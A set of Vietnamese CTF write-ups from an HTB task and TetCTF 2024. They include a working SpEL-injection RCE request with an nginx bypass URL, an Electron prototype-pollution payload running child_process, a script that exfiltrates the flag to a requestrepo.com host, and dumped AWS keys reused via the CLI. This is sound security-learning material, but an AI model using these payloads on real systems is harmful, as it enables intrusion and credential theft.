int main() {char s[500];fgets(s, 500, fopen((const char[]){'f','l','a','g','.','t','x','t','\x00'}, (const char[]){'r', '\x00'})); {puts(s);}if(1);
    else    {}} /*=;
open(my $file, 'flag.txt');print(<$file>)#";print(puts File.read('flag.txt'));#""";print(open('flag.txt').read())#*/

colored_squares
credit: MinhFanBoy
SOURCE:
here

Khi mở file này ra ta thấy đâ gồm rất nhiều file (hơn 3000) và bên trong hầu như trống và không có nhiều ký tự.
Sau một hồi loai hoay tìm hiểu thì mình nhận ra đây là một kiểu script tương tự như brainfuck. Nền lên mạng thì tìm thấy thư viện này có thể chuyển nó về file python. Đây là code sau khi mình đã chuyển.
print("Enter the flag in decimal (one character per line) :\n", end='', flush=True)
var_0 = input()
if var_0.isdigit():
    var_0 = int(var_0)
else:
    var_0 = var_0
var_1 = input()
if var_1.isdigit():
    var_1 = int(var_1)
else:
    var_1 = var_1
var_2 = input()
if var_2.isdigit():
    var_2 = int(var_2)
else:
    var_2 = var_2
var_3 = input()
if var_3.isdigit():
    var_3 = int(var_3)
else:
    var_3 = var_3
var_4 = input()
if var_4.isdigit():
    var_4 = int(var_4)
else:
    var_4 = var_4
var_5 = input()
if var_5.isdigit():
    var_5 = int(var_5)
else:
    var_5 = var_5
var_6 = input()
if var_6.isdigit():
    var_6 = int(var_6)
else:
    var_6 = var_6
var_7 = input()
if var_7.isdigit():
    var_7 = int(var_7)
else:
    var_7 = var_7
var_8 = input()
if var_8.isdigit():
    var_8 = int(var_8)
else:
    var_8 = var_8
var_9 = input()
if var_9.isdigit():
    var_9 = int(var_9)
else:
    var_9 = var_9
var_10 = input()
if var_10.isdigit():
    var_10 = int(var_10)
else:
    var_10 = var_10
var_11 = input()
if var_11.isdigit():
    var_11 = int(var_11)
else:
    var_11 = var_11
var_12 = input()
if var_12.isdigit():
    var_12 = int(var_12)
else:
    var_12 = var_12
var_13 = input()
if var_13.isdigit():
    var_13 = int(var_13)
else:
    var_13 = var_13
var_14 = input()
if var_14.isdigit():
    var_14 = int(var_14)
else:
    var_14 = var_14
var_15 = input()
if var_15.isdigit():
    var_15 = int(var_15)
else:
    var_15 = var_15
var_16 = input()
if var_16.isdigit():
    var_16 = int(var_16)
else:
    var_16 = var_16
var_17 = input()
if var_17.isdigit():
    var_17 = int(var_17)
else:
    var_17 = var_17
var_18 = input()
if var_18.isdigit():
    var_18 = int(var_18)
else:
    var_18 = var_18
var_19 = input()
if var_19.isdigit():
    var_19 = int(var_19)
else:
    var_19 = var_19
var_20 = input()
if var_20.isdigit():
    var_20 = int(var_20)
else:
    var_20 = var_20
var_21 = input()
if var_21.isdigit():
    var_21 = int(var_21)
else:
    var_21 = var_21
if (((var_7) - (var_18)) == ((var_8) - (var_9))):
    if (((var_6) + (var_10)) == (((var_16) + (var_20)) + (12))):
        if (((var_8) * (var_14)) == (((var_13) * (var_18)) * (2))):
            if ((var_19) == (var_6)):
                if (((var_9) + (1)) == ((var_17) - (1))):
                    if (((var_11) / ((var_5) + (7))) == (2)):
                        if (((var_5) + ((var_2) / (2))) == (var_1)):
                            if (((var_16) - (9)) == ((var_13) + (4))):
                                if (((var_12) / (3)) == (17)):
                                    if ((((var_4) - (var_5)) + (var_12)) == ((var_14) + (20))):
                                        if ((((var_12) * (var_15)) / (var_14)) == (24)):
                                            if ((var_18) == ((173) - (var_4))):
                                                if ((var_6) == ((63) + (var_5))):
                                                    if (((32) * (var_16)) == ((var_7) * (var_0))):
                                                        if ((125) == (var_21)):
                                                            if (((var_3) - (var_2)) == (57)):
                                                                if (((var_17) - (var_15)) == ((var_18) + (1))):
                                                                    print("Good job! :)", end='', flush=True)

Mình được một đoạn code khác dung để check flag. Thấy flag có 22 ký tự và các ký tự thỏa mãn với nhau theo các điều kiện trong hàm if nên từ đó ta có 22 ẩn và rất nhiều phương trình. Sử dụng các điều kiện ở trên với điều kiện các ký tự kia thuộc ascii và ta có thể đọc được nên ta gán khoảng giá trị cho nó 44 < x < 125, ngoài ra ta cũng có flag form là HTB{..} tương ứng với các vị trí trong flag nên ta cũng sử dụng nó để tính. Và đây là code (gần) của mình. Từ đó mình có hướng dử dụng z3 để giải hệ phương trình 22 ấn. Nhưng sau khi chạy script xong thì vẫn còn một vài chỗ trong flag bị sai nên mình phải đoán flag một chút.


from z3 import *

def main() -> None:

    flag: BitVecs = BitVecs('v0, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21', 8)

    s = Solver()

    s.add(flag[7] - flag[18] == flag[8] - flag[9])
    s.add(flag[6] + flag[10] == flag[16] + flag[20] + 12)
    s.add(flag[8] * flag[14] == 2 * flag[18] * flag[13])
    s.add(flag[19] == flag[6])
    s.add(flag[9] + 1 == flag[17] - 1)
    s.add(flag[11] == 2 * (flag[5] + 7))
    s.add(flag[5] + flag[2]/2 == flag[1])
    s.add(flag[16] - 9 == flag[13] + 4)
    s.add(flag[12] == 17 * 3)
    s.add(flag[4] - flag[5] + flag[12] == flag[14] + 20)
    s.add(flag[12] * flag[15] == 24 * flag[14])
    s.add(flag[18] + flag[4] == 173)
    s.add(flag[6] == flag[5] + 63)
    s.add(flag[16] * 32 == flag[0] * flag[7])
    s.add(flag[21] == 125)
    s.add(flag[3] - flag[2] == 57)
    s.add(flag[17] - flag[15] == flag[18] + 1)

    for i in range(len(flag)):
        s.add(flag[i] >= 48)
        s.add(flag[i] <= 125)

    s.add(flag[0] == ord('H'))
    s.add(flag[1] == ord('T'))
    s.add(flag[2] == ord('B'))
    s.add(flag[3] == ord('{'))
    s.add(flag[21] == ord('}'))

    if s.check() == sat:
        m = s.model()
        for v in flag:
           print(chr(m[v].as_long()), end="", flush=True)

if __name__ == "__main__":
    main()




TetCTF 2024 Write Up
kev1n — Tue, 30 Jan 2024 11:40:17 GMT
Web
Hello from API GW (100)
credit: endy

Bài này là một bài về cloud, lần đầu mình tiếp xúc với dạng này nên còn gà và chưa thể tự mình solved được
Khi truy cập web challenge cung cấp, ta được như sau

Dựa vào response thì ta biết được User Input hay chính là param vulnerable sẽ được Evaluated và trả về kết quả. Vì chall blackbox hoàn toàn, nên mình fuzz xem hành vi Evaluated như thế nào bằng Burp Intruder và phát hiện eval được thực hiện bằng nodejs code.
Mình dùng payload sau để RCE

Tuy nhiên sau gần nửa buổi mò mẫm trên server không ra được gì, nên mình đã DM tác giả để cầu cứu

Có được thông tin này mình chuyển sang tập trung exploit AWS.
Khi check env trên server thì mình được kết quả như sau
"AWS_LAMBDA_FUNCTION_VERSION":"$LATEST",
"AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjEDcaDmFwLXNvdXRoZWFzdC0yIkYwRAIgO+7HFGEHJ/f0RSV04kjONaSlRAeYwhNDBqGiBR8SDd8CIEj8OoHhuUa/uSZXs0BpJuWt54pY+pG0pm2mFddleILrKsUDCPD//////////wEQAxoMNTQzMzAzMzkzODU5IgxIUtYnJwb6w/X5JpMqmQO0NGpp1hU/KZFXbM5mLLXIV38cElX8/Z8FXBmW0CUPYPR8smBRN8HYEs89eOSKc/vzV3HOppp+Kfk/9oWs9obtphChd5J93mqnPPQSWkKtilQzT5IFZ2aZgvvy7Bdts2j9Ni26qveBDIms28Dt3qOIibmiW8cQ0io0DRQOPBF3lWyoktuLg5VnWviXi2BRbrK8+Rh203otRUNj49BFEvXBCFlaXAe9c4Nvj2cKC1KC6hpNae5ZRG/Y5Rw187iFitnGji7XsWIFZYqh3VBxk5EuwpWP1Jd9f++Qm+KvijK7BsAx4FERaHrOM8XvW/ofycXdIin3F/YBXOrfUoVH8oVKqPdZSwKWe6Hg5tmR/wAR+OhJMrsEPvsZjp2+TLfKlD+CPh7WFycbQQ65eZdo11IYKZvjGoeKUWXZ+BH/rNE70SKiomjJyxaL2JJMGKkYWU6pyT4qyQeBEdNvAv7LIQE0mQZ5wUJGUYum297lWnfmfW8UEEVCBa780bl3w9jopuq42l4TaWY+sRTCvovzVELBLUoyLZNseB5JMIfv3q0GOp8BR5amTDndFktnwrJeAg8aUHFlAVagFFoxVmyEu90LeFo3OrxFXheSka82yYg6ET1IWk9vNd7Lhzp3MlVRxJXmo8ljsTnKBqo0WeHnW4qNyurUeF82tHtDHUcRCOp0Z8VxzVv0uKij+/ULOywoajP5OnmNnOrN9cD9Bl26NP3ukZIB5v5cNqyqthXbpBKaGO5f5TONoGjacY0jK/sFzaCy",
"AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/TetCtfStack-VulnerableLambdaAA73A104-aSkHuTfgUzPR",
"LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"LAMBDA_TASK_ROOT":"/var/task",
"AWS_LAMBDA_RUNTIME_API":"127.0.0.1:9001",
"AWS_LAMBDA_LOG_STREAM_NAME":"2024/01/29/[$LATEST]30dd9468224f464e83c09e6d42403058",
"AWS_EXECUTION_ENV":"AWS_Lambda_nodejs18.x",
"AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129:2000",
"AWS_LAMBDA_FUNCTION_NAME":"TetCtfStack-VulnerableLambdaAA73A104-aSkHuTfgUzPR",
"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"AWS_DEFAULT_REGION":"ap-southeast-2",
"PWD":"/var/task",
"AWS_SECRET_ACCESS_KEY":"AdbLHBQeAU/IJYrJ4cJ/7RzCumpS36Pq3RxhZ0eR",
"LAMBDA_RUNTIME_DIR":"/var/runtime",
"LANG":"en_US.UTF-8",
"AWS_LAMBDA_INITIALIZATION_TYPE":"on-demand",
"NODE_PATH":"/opt/nodejs/node18/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task",
"TZ":":UTC",
"AWS_REGION":"ap-southeast-2",
"ENV_ACCESS_KEY":"AKIAX473H4JB76WRTYPI",
"AWS_ACCESS_KEY_ID":"ASIAX473H4JBYHUWJR4U",
"SHLVL":"0",
"ENV_SECRET_ACCESS_KEY":"f6N48oKwKNkmS6xVJ8ZYOOj0FB/zLb/QfXCWWqyX",
"_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129",
"_AWS_XRAY_DAEMON_PORT":"2000",
"AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR",
"_HANDLER":"index.handler",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128",
"NODE_EXTRA_CA_CERTS":"/var/runtime/ca-cert.pem",
"_X_AMZN_TRACE_ID":"Root=1-65b7b8fe-30aba47b2289b9772f9f3866;Parent=62b9a8f75698e2f1;Sampled=0;Lineage=c3b1dc18:0"

Ở đây ta có thể dễ dàng lấy được AWS_ACCESS_KEY_ID và AWS_SECRET_ACCESS_KEY để tương tác với AWS service, tuy nhiên sau mỗi lần mình đọc env thì 2 giá trị này thay đổi liên tục, chỉ có ENV_ACCESS_KEY và ENV_SECRET_ACCESS_KEY cố định không đổi. Mình dùng 2 giá trị này để thay thế.
Khởi tạo configure với access_key và secret_key
└─$ aws configure --profile cloud1
AWS Access Key ID [None]: AKIAX473H4JB76WRTYPI
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-2
Default output format [None]:

Mình dùng aws-enumerator để enum thì biết được, với credentials hiện tại thì có các permission sau:
DYNAMODB DescribeEndpoints
IAM GetAccountPasswordPolicy
SECRETSMANAGER ListSecrets
STS GetSessionToken
STS GetCallerIdentity

Nhìn vào là biết nên check cái nào đầu tiên rồi. Chạy command sau để xem ListSecrets
└─$ aws secretsmanager list-secrets --profile cloud1
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:ap-southeast-2:543303393859:secret:prod/TetCTF/Flag-gnvT27",
            "Name": "prod/TetCTF/Flag",
            "LastChangedDate": 1706155046.205,
            "LastAccessedDate": 1706486400.0,
            "Tags": [],
            "SecretVersionsToStages": {
                "44e68972-c191-4bc8-acc8-d0ba3a29cea6": [
                    "AWSCURRENT"
                ]
            },
            "CreatedDate": 1706155045.933
        }
    ]
}

Dùng command sau để đọc prod và get flag
└─$ aws secretsmanager get-secret-value --secret-id prod/TetCTF/Flag --profile cloud1
{
    "ARN": "arn:aws:secretsmanager:ap-southeast-2:543303393859:secret:prod/TetCTF/Flag-gnvT27",
    "Name": "prod/TetCTF/Flag",
    "VersionId": "44e68972-c191-4bc8-acc8-d0ba3a29cea6",
    "SecretString": "{\"Flag\":\"TetCTF{B0unTy_$$$-50_for_B3ginNeR_2a3287f970cd8837b91f4f7472c5541a}\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1706155046.202
}

J4v4 Censored (unintended solution that break nginx rules)
credit: devme4f

Preface
Chào mọi người, hôm nay mình sẽ write up lại bài J4v4 Censored trong giải TetCTF 2024 mà team mình (KCSC) đã solve được. Đây là 1 bài java mình đánh giá không quá khó nhưng lại là half-black-box nên phải đoán, fuzzing khá nhiều nên khi làm mình khá nản nhưng cũng nhờ có teammates quyết tâm tìm ra được unintended solution nên may mắn (cũng chính là team duy nhất) solved được. Let’s start!
Exploring
Đề cho url đến swagger endpoint nhưng khi truy cập thì không load được list các api:

Nguyên nhân do /v2/api-docs?group=discovery đã bị chặn:

Thử chuyển thành post method thì bypass được luôn 😀😀:

Từ info của swagger thì biết được app đang chạy /nepxion/Discovery module discovery-plugin-admin-center-starter-swagger nhưng như title discovery-springcloud-example-admin-remake thì có thể đã được modify.
Thử tìm CVE trên nền tảng này thì mình thấy có 2 lỗ hổng đáng chú ý là SpEL Injection và SSRF tại đây: https://securitylab.github.com/advisories/GHSL-2022-033_GHSL-2022-034_Discovery/
PoC của 2 lỗ hổng này cũng có sẵn rồi, nhưng khi ốp vào thì lại không ăn ngay:

Sau một hồi fuzz qua thì mình thấy các keyword như strategy, validate-expression đã bị chặn, cùng với một số ký tự như \ hay ;. Cũng dễ nhận thấy là endpoint này bị chặn bởi nginx chứ không phải java app, tiềm tàng nguy cơ bị bypass 😂.
Bypass nginx
Ý tưởng chộp đến ngay là dùng bug SSRF để bypass và request đến endpoint /strategy/validate-expression từ localhost. Thử SSRF thì đến /swagger-ui.html thì vẫn ok:

Nhưng đến /strategy/validate-expression thì không được, nguyên nhân cũng khá dễ hiểu do nginx đã chặn các keyword mình đã kể ở trên nếu nằm trong URL, mình cũng chưa tìm ra cách workaround nào khác do endpoint này lấy params từ path variable:
@RequestMapping(path = "/route/{routeServiceId}/{routeProtocol}/{routeHost}/{routePort}/{routeContextPath}", method = RequestMethod.GET)
@ApiOperation(value = "获取指定节点可访问其他节点的路由信息列表", notes = "", response = ResponseEntity.class, httpMethod = "GET")
    @ResponseBody
    public ResponseEntity route(@PathVariable(value = "routeServiceId") @ApiParam(value = "目标服务名", required = true) String routeServiceId, @PathVariable(value = "routeProtocol") @ApiParam(value = "目标服务采用的协议。取值： http | https", defaultValue = "http", required = true) String routeProtocol, @PathVariable(value = "routeHost") @ApiParam(value = "目标服务所在机器的IP地址", required = true) String routeHost, @PathVariable(value = "routePort") @ApiParam(value = "目标服务所在机器的端口号", required = true) int routePort, @PathVariable(value = "routeContextPath") @ApiParam(value = "目标服务的调用路径前缀", defaultValue = "/", required = true) String routeContextPath) {
        return doRemoteRoute(routeServiceId, routeProtocol, routeHost, routePort, routeContextPath);
    }

Chall cũng được cấu hình để chặn out-bound do đó không thể bypass bằng cách tự host server để redirect về lại endpoint mong muốn.
Stuck tầm 1 ngày thì cuối cùng đồng đội mình (@null001) đã tìm ra cách bypass nginx proxy để request được đến /strategy/validate-expression và exploit SpEL inject, cũng chẳng cần đến bug SSRF luôn(nghe là intended):

URL để bypasss như sau:
/strategy;%2f%2e%2e%2f/validate-expression;%2f%2e%2e%2f/

Vì không có source nên mình không thể confirm (sau khi giải end có source thì đã confirm được) nhưng mình giả định nguyên nhận là do nginx khi nhận request sẽ thực hiện normalize url trước khi thực hiện các directives để check. Quá trình normalize đơn giản hóa như sau stackoverflow:

Do đó khi thực hiện request trên, nginx sẽ thực hiên url decode và normalize thành $uri='/' đẫn đến các rule check trên $uri='/' bằng 0 😆😆.
Nhưng cũng chưa ngon ăn ngay do param expression đã được tác giả custom lại và thêm các backlist keyword mà khi thực hiện SpEL inject sẽ không ăn ngay mà mình fuzz được thì đó là ', " và toString. Ngồi bypass tiếp thôi
Bypass SpEL injection blacklist
Với các keyword bị blacklist là ', " và toString nhằm chặn tạo chuỗi string thì ai quen thuộc với dạng đề CTF này mình nghĩ cũng sẽ không quá khó khăn để bypass.
Do đang là dạng spel inject blind (+ không có out-bound) nên mình hình dung payload để exploit nó sẽ tương tự như này, hạn chế sử dụng các chuỗi string cũng như lấy được input và trả về response đều từ header:
T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().setHeader(1,(T(java.util.Scanner).getConstructor(T(java.io.InputStream)).newInstance(new ProcessBuilder(T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getRequest().getHeader(1)).start().getInputStream()).useDelimiter("\\A").next()))

Để dễ hiểu thì payload có thể được chia nhỏ như sau:

Lấy spring response object để kiểm soát response của request:

T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse()


Gọi setHeader() để trả về output của command từ response

Dùng Scanner để lấy hết string output từ inputstream của process:


T(java.util.Scanner).getConstructor(T(java.io.InputStream)).newInstance().useDelimiter("\\A").next()


Gọi ProcessBuilder thực thi command:

new ProcessBuilder().start()


Lấy spring request object để lấy được input (command) từ request hiện tại:

T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getRequest()


Và gọi getHeader() để lấy input từ header 1

Để build được payload trên thì mình tự dựng lab tại local để test cho dễ thôi, tuy nhiên payload trên vẫn có chỗ bị blacklist đó là "\A", để bypass có thể dùng cách sau

Convert qua dạng ssti:
(new String(T(java.lang.Character).toChars(92))).concat(new String(T(java.lang.Character).toChars(65)))

Full payload:
GET /strategy;%2f%2e%2e%2f/validate-expression;%2f%2e%2e%2f/?condition=T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().setHeader(1,(T(java.util.Scanner).getConstructor(T(java.io.InputStream)).newInstance(new+ProcessBuilder(T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getRequest().getHeader(1)).start().getInputStream()).useDelimiter((new+String(T(java.lang.Character).toChars(92))).concat(new+String(T(java.lang.Character).toChars(65)))).next()))&validation=a%3dtest HTTP/2
Host: java.tienbip.xyz
1: /readflag

Done 😇:

flag:
TetCTF{ssrf`bYp4ss-sst!;W1th<3. :)}

end - ref
source được cung cấp:
https://drive.google.com/file/d/1HZ268tSJK8FuSR-Y7c8XCuv5hOt7tF6R/view?usp=sharing
nginx.conf:
server {
      listen 80;

      server_name    2024.tet.ctf;
      access_log /var/log/nginx/tetctf-access.log;
      error_log /var/log/nginx/tetctf-error.log;



      location / {
            proxy_set_header X-Forwarded-Host $host;
            proxy_set_header X-Forwarded-Server $host;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_pass http://nepxion-admin:1101;
      }

      location /v2/api-docs {
            if ($request_method = GET) {
                  rewrite /v2/api-docs /null break;
            }
            proxy_pass http://nepxion-admin:1101/v2/api-docs;
      }

      location ~ .*strategy.* {
            # prevent any cve for api endpoint :) 
            deny all;
      }


      location ~ .*validate-expression.* {
            # prevent any cve for api endpoint :) 
            deny all;
      }

      location ~ .*\/..\; {
            # it's bad for Tomcat :)
            deny all;
      }

      location ~ .*\/\; {
            # it's bad for Tomcat :)
            deny all;
      }

      location ~ .*\; {
            # it's bad for Tomcat :)
            deny all;
      }

}

Check location regex block trước prefix block:

X Ét Ét
credit: chanze
Bối cảnh
Bước đầu ta xem qua các chức năng của trang web bao gồm:

Đăng ký

Đăng nhập

Tạo ticket

Report ticket


Xem qua source có ta sẽ thấy có 3 folder chính là:

app

bot

server


Ta xem qua entrypoint.sh:
#!/bin/sh


echo /app/flag.c
gcc /app/flag.c -o /flag
chmod 111 /flag

rm /app/flag.c

/usr/bin/supervisord -c /etc/supervisord.conf

Ta xác định mục tiêu là RCE để đọc flag.
Tại folder app và bot ta biết được hành vi của con bot sẽ mở trình duyệt bằng electron và truy cập vào nội dung mà ta report. Như tên bài và ta thấy electron thì ta xác định được đây là một bài XSS -> RCE trong electron.
Phân tích
Ta xem qua chức năng tạo ticket:

Điều đáng chú ý là tại đây ta có tính năng upload file khi tạo ticket, ta xem qua code của chức năng này:

Tại đây có 2 điều đáng chú ý sau:
Thứ nhất title, conetent được lưu vào db nhưng không qua santize.
Thứ hai file ta upload lên sẽ không trải qua bất kì bước santize về nội dung của file. Tên file khi lưu trên server sẽ là một chuỗi uuid ngẫu nhiên với extension do chính ta kiểm soát.

Khi lần đầu đọc qua mô tả của hàm splitext thì ý tưởng đầu tiên xuất hiện trong đầu mình là Path Traversal. Tuy nhiên hàm này được code rất an toàn, nên việc khai thác path traversal là không thể

Tiếp đến sau khi tạo ticket thì mình đến với chức năng report thì luồng chương trình sẽ như sau:

Tại đây chương trình sẽ lấy ra ticket từ id do ta gửi lên, khi này id, ticket.title, ticket.content sẽ qua bleach.clean() sau đấy được gửi tới http://127.0.0.1:5001. Công dụng và cách dùng bleach.clean() an toàn được ghi như sau trong documentation:

Tiếp theo sau khi đi từ POST request dữ liệu sẽ được xử lý như sau:

Tại đây ta thấy rằng id, ticket.title, ticket.content sẽ qua base64 encode và gán vào biến môi trường và chạy file /app/app/run.sh
/app/app/run.sh
#!/bin/bash

rm -rf /tmp/.X99-lock
Xvfb :99 &
cd "/app/app"
#
timeout -k 2 3 node_modules/.bin/electron . --disable-gpu --no-sandbox --args  --ignore-certificate-errors &

Từ code thì ta thấy rằng sẽ chạy electron app:

Khi này ta có thể xác định rằng id, ticket.title, ticket.content đã được xử lý an toàn bằng bleach.clean() đúng cách, nên ta không thể khai thác XSS từ các giá trị trên tại đây.
Nhưng tại đây có một lỗ hổng khác, ta có thể thấy:
local = link.includes("http://localhost/tmp/");

Tại đây thay vì dùng startsWith thì tác giả sử dụng includes, regex ở trên match với kết quả như sau:

Như vậy ta có thể kiểm soát hoàn toàn src của iframe.
Khi này ta có thể cho trỏ về trang web của chúng ta để XSS, đấy là điều ta sẽ làm nếu như server cho phép ta ra mạng, tác giả đã config iptables để chặn chúng ta ra mạng:

Vậy tại đây ta có còn cách nào để khai thác XSS hay không? Câu trả lời là có, nhưng mình sẽ nói ở phần sau của bài viết.
Ta thấy sau khi qua chỗ gán src cho iframe thì chương trình tiếp tục kiểm tra xem content có bắt đầu bằng [IMPORTANT ALERT] hay không:

Để content bắt đầu bằng [IMPORTANT ALERT] thì ta phải tạo ticket với username là admin:

Nhưng user admin đã được khởi tạo ngay khi chương trình chạy. Ta tìm cách để bypass chỗ này, như ta thấy thì username sẽ được lấy từ session:
username = session.get('username')

Khi ta login thì chương trình sẽ gán giá trị username vào session như sau:

Như ta thấy thay vì gán trực tiếp username vào session thì tại đây username sẽ qua strip(), hàm strip() sẽ loại bỏ mọi khoảng trắng ở cả 2 đầu của chuỗi, nên tại đây ta chỉ việc thêm các ký tự khoảng trắng vào 2 đầu của username là sẽ thành công bypass.
Khi này ta đã thành công popup được notification window (hay có thể được nói là gọi được event CreateViewer)

Tuy nhiên trang được mở trong notification window là một endpoint được gán CSP:

Như ta thấy thì tại script-src là self, kết hợp với việc ta có thể upload file lên server như vậy ta có thể upload file js lên và load vào tag script? Kịch bản này đẹp nhưng nó không thể xảy ra vì khi ta lấy file về thì sẽ được trả về dưới dạng JSON

Nên hiện tại ta vẫn chưa thể XSS được.
Những gì đã có
Sau đây là những gì quan trọng ta đã kiếm được sau quá trình phân tích:

Có thể upload file với extension hoàn toàn do ta kiểm soát

Có thể kiểm soát src trong iframe của trang bot mở khi có report, tuy nhiên vì firewall chặn không cho ra mạng nên ta vẫn chưa thể XSS

Có thể popup được notification window ( hay còn được biết là trigger được event CreateViewer, nhưng vì CSP nên vẫn chưa thể XSS


XSS
Từ những dữ liệu đã có ở trên ta hoàn toàn có thể tấn công XSS thành công.
Tại main window thì iframe sẽ ra sao nếu ta cho iframe hiển thị nội dung của file html trong local?
Tại notification window sẽ ra sao nếu ta cho trang web redirect về file html trong local?
Kết hợp với dữ kiện ở trên là ta có thể upload file với nội dung bất kì lên server cùng với việc extension của file sẽ hoàn toàn do ta kiểm soát.
Khi này trang web sẽ hoàn toàn do ta kiểm soát.
Luồng khai thác tại đây sẽ như sau:

Upload malicous html file với extension là html

Tạo ticket với content chứa meta tag redirect về file ta vừa upload trên server (file:///tmp/.html)

Khi này tại main window thì ta cho truy cập vào /isNew endpoint cùng với id của tiket ta vừa tạo ở trên.

Còn tại notification window thì ta chỉ cần report là được




Khi này ta đã XSS được cả 2 window là main window và notification window
Electron
Mình đề xuất video sau để tham khảo về XSS -> RCE trong Electron, nếu bạn chưa viết về Electron: https://youtu.be/Tzo8ucHA5xw?si=Ac-sDASQuJ2Nguox
Ngoài ra bạn cũng có thể đọc bài viết bằng Tiếng Việt sau:
https://nhienit.wordpress.com/2023/06/26/cve-2022-3133-draw-io-xss-leads-to-rce/
Ta xét qua config của main window:
main window

notification window

Ta thấy rõ rằng webPreferences của notification window có vấn đề khi sandbox là false và contextIsolation cũng là false. Ta có thể tấn công theo kiểu prototype pollution như trong video ở trên mình đề xuất thì ta sẽ khai thác như sau:


exploit.html
<script>
    const orgCall = Function.prototype.call;
    Function.prototype.call = function(...args){
        if(args[3] && args[3].name == "__webpack_require__"){
            window.__webpack_require__ = args[3];
            Function.prototype.call = orgCall
            __webpack_require__('module')._load("child_process").exec("/flag > /app/server/static/flag_chanze.txt")
        }
        return orgCall.apply(this,args);
    }
script>

Các bước khai thác:

Tạo acc để bypass admin và đăng nhập

Upload file exploit.html

Tạo ticket với title 

Report tới admin

Truy cập vào static/flag_chanze.txt để lấy flag


Ngoài ra còn hướng khai thác khác được giới thiệu trong discord sau khi giải end:

leak_dns.html
<script>

fetch("file:///flag").then(r => r.text()).then(r => r.match(/TetCTF\{(.*?)\}/)[1]).then(flag =>(fetch(`http://${flag}.fgabdckk.requestrepo.com`)))

script>

Ta có thể khai thác theo hướng này tuy nhiên kết quả sẽ bị đưa về lowercase hết

Honorable Mention

Write Up X Ét Ét (credit: Ngọc Trần)

Crypto
flip
credit: nomorecaffeine
Ý tưởng
Đề bài cho ta một file elf để encrypt aes và một file python
Nhiệm vụ của file python là cho phép ta sửa lại 1 byte của file elf.
    # input format: hex(plaintext) i j
    try:
        plaintext_hex, i_str, j_str = input().split()
        pt = bytes.fromhex(plaintext_hex)
        assert len(pt) == 16
        i = int(i_str)
        assert 0 <= i < len(content)
        j = int(j_str)
        assert 0 <= j < 8
    except Exception as err:
        print(err, file=sys.stderr)
        # ban_client()
        return

    # update key, plaintext, and inject the fault
    content[OFFSET_KEY:OFFSET_KEY + 16] = key
    content[OFFSET_PLAINTEXT:OFFSET_PLAINTEXT + 16] = pt
    content[i] ^= (1 << j) # sửa 1 byte

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[200]; // [rsp+0h] [rbp-D0h] BYREF
  unsigned __int64 v5; // [rsp+C8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  AES_init_ctx((__int64)v4, (__int64)&key);
  AES_ECB_encrypt((__int64)v4, (__int64)&plaintext);
  write(1, &plaintext, 0x10uLL);
  return 0;
}

Ta chú ý content[i] ^= (1 << j) # sửa 1 byte ta có thể sửa 1 byte tuỳ ý.
Đến đây ta có 2 hướng:

sửa size 0x10 thành size > 0x20 để có thể in ra cả key (vì biến plaintext và key nằm cạnh nhau)
  

sửa địa chỉ plaintext thành key


Khai thác
Bằng cách dùng debug mình biết được i là 0x11b9+1=4538 chính là byte 0x10

Và mình tìm j = 5
>>> hex(0x10 ^ (1 << 5))
'0x30'

Kết quả

flip v2
credit: nomorecaffeine
Tương tự như bài trên nhưng bây giờ ta không được phép flip bit tại hàm main()
# input format: hex(plaintext) i j
try:
    plaintext_hex, i_str, j_str = input().split()
    pt = bytes.fromhex(plaintext_hex)
    assert len(pt) == 16
    i = int(i_str)
    assert 0 <= i < len(content)
    assert not OFFSET_MAIN_START <= i < OFFSET_MAIN_END
    j = int(j_str)
    assert 0 <= j < 8
except Exception as err:
    print(err, file=sys.stderr)
    # ban_client()
    return

Vì không có ý tưởng gì kết hợp với việc nhận thấy các giá trị co thể dẫn đến việc thay đổi kết quả của file elf trong khoảng có thể bruteforce (0x11ED -> 0x2395). Nên quyết định dựng local và lấy output về phân tích với key = b'aaaaaaaaaaaaaaaa'
start = 0x11ED
end = 0x2395 

re_ct = ''

for i in range(0x11ED, 0x2395):
    if OFFSET_MAIN_START <= i < OFFSET_MAIN_END:
        continue
    for j in range(8):
        conn = remote('localhost', 31339)
        pt = 'a'*32
        to_send = pt + ' ' + str(i) + ' ' + str(j)
        conn.sendline(to_send.encode())
        try:
            ct = conn.recvline().strip().decode()
            if ct != re_ct:
                re_ct = ct
                print(ct)
                f = open('output.txt', 'a')
                f.writelines(str([i, j, ct]) + '\n')
                f.close()
        except:
            pass
        conn.close()

Trong lúc xem qua file thì nhận thấy một số output khá đặc biệt như sau:

Trả về 32 bytes

[4452, 0, 'b49144452613952f3fa727f6875acf484d2803e7297ee8cb8d0bfdd2823f4de5']


Trả về null byte

[5264, 3, 'b49144452613952f3fa727f6875acf48']
[5295, 6, '']
[5297, 1, 'b49144452613952f3fa727f6875acf48']
[5298, 7, '']


Trả về các byte giống hệt nhau

[5463, 1, 'cbcbcbcbcbcbcbcbcbcbcbcbcbcbcbcb']
[5465, 0, 'f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0']
[5466, 4, 'f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0']
[5468, 7, '89898989898989898989898989898989']

